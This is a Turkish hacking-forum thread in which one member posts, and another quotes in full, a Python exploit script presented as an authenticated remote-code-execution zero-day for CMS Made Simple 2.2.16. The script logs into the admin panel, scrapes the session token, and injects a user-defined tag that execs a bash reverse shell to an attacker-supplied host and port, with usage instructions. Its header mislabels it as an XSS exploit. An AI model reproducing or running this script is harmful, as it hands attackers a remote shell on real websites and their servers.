CMS Made Simple 2.2.16 "editusertag.php" - RCE (Authenticated) Zero-Day Exploit!

DeathWarrior01

Uzman üye
14 Ocak 2021
1,731
1,070
Evren
CMS Made Simple 2.2.16 "editusertag.php" - Remote Code Execution (Authenticated) Zero-Day!
Python:
# Exploit Title: CMS Made Simple 2.2.16 - 'm1_fmmessage' Cross-Site Scripting (XSS) Zero-Day
# Date: 2022/04/14
# Exploit Author: TurkHackTeam | DeathWarrior01
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: https://s3.amazonaws.com/cmsms/downloads/14953/cmsms-2.2.16-install.zip
# Version: 2.2.16
# Cve: N/A

from bs4 import BeautifulSoup
from requests import Session
from sys import argv
import requests

try:
    # Remote
    rhost = str(argv[1])
    rport = str(argv[2])
    username = str(argv[5])
    password = str(argv[6])

    # Local
    lhost = str(argv[3])
    lport = str(argv[4])
   
    logın_url = (f"http://{str(rhost)}:{str(rport)}/admin/login.php")

    with Session() as ses:
        url_get = ses.get(logın_url)
        logın_data = {"username":f"{username}","password":f"{password}","loginsubmit":"submit"}
        ses.post(logın_url, logın_data)
        admın_page = ses.get(f"http://{str(rhost)}:{str(rport)}/admin/index.php")
        bs_content = BeautifulSoup(admın_page.content, "html.parser")
        token_parse = bs_content.find("link", {"rel":"stylesheet"})["href"]
        token = token_parse[14:33]
        userDefinedTag_url = (f"http://{str(rhost)}:{str(rport)}/admin/editusertag.php?__c={token}&userplugin_id=2")
        userTag_get = ses.get(userDefinedTag_url)
       
        bs_description = BeautifulSoup(userTag_get.content, "html.parser")
        description = bs_description.find("input", {"name":"userplugin_name"})["value"]
        print("Done :)")
        exploıt_form = {"__c":f"{str(token)}","userplugin_id":"2","userplugin_name":str(description),"code":['exec("' + f"/bin/bash -c 'bash -i > /dev/tcp/{lhost}/{lport} 0>&1'"+'");','exec("' + f"/bin/bash -c 'bash -i > /dev/tcp/{lhost}/{lport}     0>&1'"+'");'],"description":"You are hacked :)","run":"1","apply":"1","ajax":"1"}

        exploıt_go = ses.post(userDefinedTag_url, exploıt_form)

except IndexError:
    print("""
        Usage:
        python exploit.py <rhost> <rport> <lhost> <lport> <username> <password>
    """)
 
Son düzenleme:

ByFelez

Uzman üye
9 Tem 2013
1,822
1,778
CMS Made Simple 2.2.16 "editusertag.php" - Remote Code Execution (Authenticated) Zero-Day!
Python:
# Exploit Title: CMS Made Simple 2.2.16 - 'm1_fmmessage' Cross-Site Scripting (XSS) Zero-Day
# Date: 2022/04/11
# Exploit Author: TurkHackTeam | DeathWarrior01
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: https://s3.amazonaws.com/cmsms/downloads/14953/cmsms-2.2.16-install.zip
# Version: 2.2.16
# Cve: N/A

from bs4 import BeautifulSoup
from requests import Session
from sys import argv
import requests

try:
    # Remote
    rhost = str(argv[1])
    rport = str(argv[2])
    username = str(argv[5])
    password = str(argv[6])

    # Local
    lhost = str(argv[3])
    lport = str(argv[4])
   
    logın_url = (f"http://{str(rhost)}:{str(rport)}/admin/login.php")

    with Session() as ses:
        url_get = ses.get(logın_url)
        logın_data = {"username":f"{username}","password":f"{password}","loginsubmit":"submit"}
        ses.post(logın_url, logın_data)
        admın_page = ses.get(f"http://{str(rhost)}:{str(rport)}/admin/index.php")
        bs_content = BeautifulSoup(admın_page.content, "html.parser")
        token_parse = bs_content.find("link", {"rel":"stylesheet"})["href"]
        token = token_parse[14:33]
        userDefinedTag_url = (f"http://{str(rhost)}:{str(rport)}/admin/editusertag.php?__c={token}&userplugin_id=2")
        userTag_get = ses.get(userDefinedTag_url)
       
        bs_description = BeautifulSoup(userTag_get.content, "html.parser")
        description = bs_description.find("input", {"name":"userplugin_name"})["value"]
        print("Done :)")
        exploıt_form = {"__c":f"{str(token)}","userplugin_id":"2","userplugin_name":str(description),"code":['exec("' + f"/bin/bash -c 'bash -i > /dev/tcp/{lhost}/{lport} 0>&1'"+'");','exec("' + f"/bin/bash -c 'bash -i > /dev/tcp/{lhost}/{lport}     0>&1'"+'");'],"description":"You are hacked :)","run":"1","apply":"1","ajax":"1"}

        exploıt_go = ses.post(userDefinedTag_url, exploıt_form)

except IndexError:
    print("""
        Usage:
        python exploit.py <rhost> <rport> <lhost> <lport> <username> <password>
    """)
Ellerinize Sağlık hocam.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.